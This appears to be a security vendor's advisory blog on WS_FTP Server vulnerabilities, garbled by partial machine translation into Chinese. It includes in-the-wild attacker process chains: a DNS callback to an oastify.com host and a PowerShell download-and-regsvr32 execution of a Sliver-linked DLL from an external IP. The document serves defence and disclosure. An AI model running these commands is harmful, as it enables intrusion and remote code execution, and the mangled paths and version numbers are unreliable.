最后更新于2023年10月3日星期二19:04:41 GMT

On September 27, 2023, Progress Software published a security advisory on multiple vulnerabilities affecting WS_FTP Server,一个安全的文件传输解决方案. 该通知中存在许多漏洞, 其中两个是关键漏洞(CVE-2023-40044和CVE-2023-42657). 我们的研究小组已经确定了似乎是 .NET deserialization vulnerability (CVE-2023-40044) and confirmed that it is exploitable with a single HTTPS POST request and a pre-existing ysoserial.net gadget.

Note: As of September 30, Rapid7 has observed multiple instances of WS_FTP exploitation in the wild. We detail this activity in the Observed Attacker Behavior section of this blog.

报告中的漏洞涵盖了一系列受影响的版本, and several affect only WS_FTP servers that have the Ad Hoc Transfer module enabled. Nevertheless, Progress Software’s advisory urges all customers to update to WS_FTP Server 8.8.2,即软件的最新版本. Rapid7 echoes this recommendation. 供应商咨询有关于升级的指导, 以及禁用或删除Ad Hoc传输模块的信息.

关键漏洞如下-特别是NVD分数 CVE-2023-40044 仅作为“高”的严重程度,而不是危急的:

  • CVE-2023-40044: 在WS_FTP服务器版本8之前.7.4 and 8.8.2、Ad Hoc Transfer模块存在安全漏洞 .NET deserialization vulnerability that allows an unauthenticated attacker to execute remote commands on the underlying WS_FTP Server operating system. 该漏洞影响WS_FTP服务器Ad Hoc模块的所有版本. Progress Software’s advisory indicates that WS_FTP Server installations without the Ad Hoc Transfer module installed are not vulnerable to CVE-2023-40044.
  • CVE-2023-42657: WS_FTP服务器版本在8之前.7.4 and 8.8.2 are vulnerable to a directory traversal vulnerability that allows an attacker to perform file operations (delete, rename, rmdir, 在其授权的WS_FTP文件夹路径之外的文件和文件夹上. Attackers could also escape the context of the WS_FTP Server file structure and perform the same level of operations (delete, rename, rmdir, Mkdir)在底层操作系统上的文件和文件夹位置.

下面列出了其他(非关键)漏洞. See Progress Software’s advisory for full details:

  • CVE-2023-40045: 在WS_FTP服务器版本8之前.7.4 and 8.8.2, the Ad Hoc Transfer module is vulnerable to reflected cross-site scripting (XSS). Delivery of a specialized payload could allow an attacker to execute malicious JavaScript within the context of the victim's browser.
  • CVE-2023-40046: 在版本8之前的WS_FTP Server管理器界面.7.4 and 8.8.2易受SQL注入攻击, which could allow an attacker to infer information about the structure and contents of the database and execute SQL statements that alter or delete database elements.
  • CVE-2023-40047: 在版本8之前的WS_FTP服务器管理模块.8.2容易受到存储跨站点脚本(XSS)的攻击, which could allow an attacker with administrative privileges to import an SSL certificate with malicious attributes containing cross-site scripting payloads.  成功存储跨站点脚本负载之后, an attacker could leverage this vulnerability to target WS_FTP Server admins with a specialized payload which results in the execution of malicious JavaScript within the context of the victim's browser.  
  • CVE-2023-40048: WS_FTP Server 8之前版本中的Manager界面.8.2 was missing cross-site request forgery (CSRF) protection on a POST transaction corresponding to a WS_FTP Server administrative function.
  • CVE-2023-40049: 在WS_FTP服务器版本8之前.8.2, an unauthenticated user could enumerate files under the 'WebServiceHost' directory listing.  
  • CVE-2022-27665: WS_FTP Server 8.6.0容易受到XSS的反射(通过AngularJS沙盒转义表达式), which allows an attacker to execute client-side commands by inputting malicious payloads in the subdirectory search bar or Add folder filename boxes. For example, there is Client-Side Template Injection via subFolderPath to the ThinClient/WtmApiService.asmx/GetFileSubTree URI.

Observed Attacker Behavior

在9月30日晚上, 2023, Rapid7 observed what appears to be exploitation of one or more recently disclosed WS_FTP vulnerabilities in multiple customer environments. Individual alerts our team responded to occurred within minutes of one another between 2023-10-01 01:38:43 UTC and 01:41:38 UTC.

流程执行链在所有观察到的实例中看起来是相同的, 表明可能大量利用易受攻击的WS_FTP服务器. Additionally, our MDR team has observed the same Burpsuite domain used across all incidents, 这可能表明我们所看到的活动背后有一个单一的威胁行为者.

Great-grandparent Process:
C:\Windows\SysWOW64\inetsrv\w3wp.exe -ap "WSFTPSVR_WTM" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iisipm18823d36-4194-409a-805b-cea0f4389a0c -h "C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config" -w "" -m 1 -t 20 -ta 0

Grandparent Process:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.C:\Windows\Microsoft . exe" /noconfig /fullpaths @.NET\Framework\v4.0.30319\Temporary ASP.网络文件\出去\ e514712b \ a2ab2de1 \ ryvjavth.cmdline

Parent Process:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.. exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES6C8F . exe.tmp" "c:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.网络文件\出去\ e514712b \ a2ab2de1 \ CSCCEF3EFC08A254FF1848B4D8FBBA6D0CE.TMP

Child Process:
C:\Windows\System32\cmd.exe" /c cmd.. exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com


Great-grandparent Process:
C:\WINDOWS\SysWOW64\inetsrv\w3wp.exe -ap "WSFTPSVR_WTM" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iisipme6a8a618-bb7f-470c-92e9-58204f6ffcfa -h "C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config" -w "" -m 1 -t 20 -ta 0

Grandparent Process:
C:\Windows\System32\cmd.“/c powershell /c”IWR http://172.245.213[.[135:3389/bcrypt -OutFile c:\users\public\NTUSER ..dll

Parent Process:
powershell /c "IWR http://172.245.213[.[135:3389/bcrypt -OutFile c:\users\public\NTUSER ..dll

Child Process:
C:\Windows\System32\cmd./c regsvr32 c:\users\public\NTUSER . exe.dll

Upon execution, NTUSER.dll 联系了Cloudflare的工作人员 status.backendapi-fe4[.]workers[.]dev which drops an additional file, stage2.zip, into memory. Stage2.zip contains another executable within that appears to be using Golang and communicates with the domain realtime-v1[.]backendapi-fe4[.]workers[.]dev. Analysis of NTUSER.dll 确定它与silver开发后框架相关联.

Mitigation guidance

Progress Software security advisories have borne increased scrutiny and garnered broader attention from media, users, 以及自2023年5月Cl0p勒索软件组织以来的安全社区 attack on MOVEit Transfer. Secure file transfer technologies more generally continue to be popular targets for researchers and attackers.

自9月30日以来,WS_FTP服务器一直处于活跃状态, 我们建议在紧急情况下更新到固定版本, 无需等待典型的补丁周期发生. As noted in the advisory, "upgrading to a patched release using the full installer is the only way to remediate this issue. 当升级运行时,系统将会中断."

最理想的做法是升级到8.8.2 as the vendor has advised. If you are using the Ad Hoc Transfer module in WS_FTP Server and are not able to update to a fixed version, 请考虑禁用或移除该模块.

See Progress Software's advisory for the latest information.

Rapid7 customers

InsightVM and Nexpose customers running WS_FTP can assess their exposure to all eight of the CVEs in this blog with authenticated vulnerability checks available in today’s (September 29) content release.

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. The following detection rules are deployed and alerting on activity related to WS_FTP Server exploitation:

  • 可疑进程- WS_FTP服务器进程生成CMD子进程
  • Webshell - IIS生成CMD生成PowerShell
  • Webshell - IIS Spawns PowerShell
  • Webshell -由Webserver启动的命令
  • 可疑进程-命令行中与Burpsuite相关的域

Velociraptor has an artifact to detect strings associated with potential exploitation of WS_FTP  in IIS logs.


September 30: Updated to note Rapid7 is observing multiple instances of WS_FTP exploitation in the wild and Velociraptor has an artifact available to assist in threat hunting. Proof-of-concept exploit code for CVE-2023-40044 is also publicly available as of the evening of Friday, September 29. 发现CVE-2023-40044的Assetnote有一篇完整的文章 here as of September 30.

October 1: Updated with details on a second attack chain observed by Rapid7 managed services.

October 2: Updated to specify detection rules alerting on WS_FTP Server exploitation for Rapid7 MDR and InsightIDR customers.